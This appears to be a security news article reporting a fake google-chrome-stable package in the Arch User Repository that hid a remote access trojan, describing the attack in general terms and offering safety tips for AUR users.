The Arch User Repository (AUR) is a powerful community-driven resource for Arch Linux users, offering access to a vast range of software through user-submitted PKGBUILDs. However, this openness also creates an opportunity for malicious actors to exploit unsuspecting users.

Just weeks after a Remote Access Trojan (RAT) was discovered hidden inside browser-related packages, a new fake package mimicking Google Chrome has surfaced with another RAT embedded.

What Happened

A package named google-chrome-stable was recently uploaded to the AUR by a newly registered user named “forsenontop”. The account had no other contributions, raising immediate red flags within the community.

The package used a malicious .install script, which executed a Python command to download and run remote code silently in the background every time the Chrome browser was launched. This behavior made it a stealthy threat with no visible symptoms to the user.

The infection method is similar to a previous case where RAT payloads were distributed using GitHub links embedded inside the PKGBUILD file.

The suspicious behavior was flagged by a vigilant user, and the AUR team responded promptly by removing the package from the repository.

 How to Check If You’re Affected

If you’ve recently installed or updated packages related to Google Chrome from the AUR, it’s crucial to check your system immediately.

To verify if the malicious package is installed, run:

If the package is present, remove it without delay:

Also, scan your system for any lingering malicious scripts or abnormal Python processes.

Stay Safe: Tips for Arch Users

This incident underscores the need for extra caution when using the AUR. Here are a few best practices to follow:

• Inspect PKGBUILDs manually before installing, especially for new or obscure packages.

• Avoid packages submitted by new or inactive users with no reputation.

• Update your system regularly to benefit from security patches.

• Use tools like aurutils or yay with auditing features.

• Enable a firewall and apparmor/SELinux where possible.

The Arch community’s quick response helped limit the impact of this fake google-chrome-stable package, but it’s a reminder that trust and transparency are essential in open-source ecosystems.

As AUR grows, so do the risks. Always verify, review, and install responsibly.